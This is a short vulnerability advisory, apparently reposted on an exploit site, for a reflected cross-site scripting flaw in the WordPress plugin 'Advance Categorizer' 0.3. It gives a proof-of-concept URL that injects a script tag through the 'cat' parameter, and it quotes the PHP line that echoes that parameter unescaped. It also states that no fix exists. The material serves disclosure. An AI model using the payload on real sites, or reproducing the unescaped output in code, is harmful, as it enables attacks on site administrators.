WordPress Advance Categorizer 0.3 Cross Site Scripting Vulnerability

ID 1337DAY-ID-23962
Type zdt
Reporter Kenneth Jepsen
Modified 2015-08-04T00:00:00


Exploit for php platform in category web applications

                                            Title: WordPress 'Advance Categorizer' Plugin
Version: 0.3
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-24
- https://wordpress.org/plugins/advance-categorizer/
- https://plugins.svn.wordpress.org/advance-categorizer/
Notified WordPress: 2015-06-24

## Plugin description
Allows you to add multiple categories using comma seperated text. You can also start via url "/wp-admin/post-new.php?cat=category1, category2, categor

## Reflected XSS vulnerabilities
The plugin is vulnerable to reflected XSS, which allow an attacker to trick an admin into executing an arbitrary script in the admin panel.

Log in as admin and visit this url: [URL]/wp-admin/post-new.php?cat=asdf"/><script>confirm(/Hackedihack/)</script>

Vulnerable code in file advance-categorizer.php:

L.61: ... value="<?=isset($_GET['cat'])?$_GET['cat']:(isset($_GET['categories'])?$_GET['categories']:'');?>" ...

## Solution
No fix available

Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

#  0day.today [2018-03-28]  #